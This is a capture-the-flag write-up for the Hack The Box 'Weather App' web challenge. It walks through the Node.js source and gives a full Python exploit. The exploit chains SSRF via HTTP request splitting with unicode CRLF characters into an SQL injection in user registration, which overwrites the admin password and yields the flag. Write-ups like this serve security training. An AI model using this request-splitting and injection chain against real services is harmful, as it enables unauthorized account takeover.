kali@kali:~/0.htb/challenges/Web/Weather_App/web_weather_app$ sudo ./build-docker.sh
then access the challenge at http://127.0.0.1:1337
Now, let's dig into the code. This is a Node.js app using express, so we can see all 4 available routes at routes/index.js.
/, /register, /login, /api/weather
Let's take a look at the database functions inside database.js:
the username column is UNIQUE and that there is already an user with username 'admin'.
isAdmin() function is not vulnerable to injection, since it uses '?' to insert the parameters in the query and they already sanitize escape quotes. However, register() function does, since it doesn't use '?'. This means that we can only inject malicious payloads into the database by registering a new user.
Server-Side Request Forgery
https://www.rfk.id.au/blog/entry/security-bugs-ssrf-via-request-splitting/
https://github.com/hacefresko/HTB-Web-WriteUps/blob/main/Weather%20App/Weather%20App.md
ssrf.py
import requests
url = 'http://138.68.182.108:31439'
username = "admin"
password = "1337') ON CONFLICT(username) DO UPDATE SET password = 'admin';--"
parsedUsername = username.replace(" ","\u0120").replace("'","%27").replace("'","%22")
parsedPassword = password.replace(" ","\u0120").replace("'","%27").replace("'","%22")
contentLength = len(parsedUsername) + len(parsedPassword) + 19
endpoint = '127.0.0.1/\u0120HTTP/1.1\u010D\u010AHost:\u0120127.0.0.1\u010D\u010A\u010D\u010APOST\u0120/register\u0120HTTP/1.1\u010D\u010AHost:\u0120127.0.0.1\u010D\u010AContent-Type:\u0120application/x-www-form-urlencoded\u010D\u010AContent-Length:\u0120' + str(contentLength) + '\u010D\u010A\u010D\u010Ausername=' + parsedUsername + '&password=' + parsedPassword + '\u010D\u010A\u010D\u010AGET\u0120/?lot='
r = requests.post(url + '/api/weather', json={ 'endpoint': endpoint, 'city' : 'lol', 'country' : 'lol'})
kali@kali:~/0.htb/challenges/Web/Weather_App$ python3 ssrf.py
http://138.68.182.108:31439/login
username admin password admin
HTB{w3lc0m3_t0_th3_p1p3_dr34m}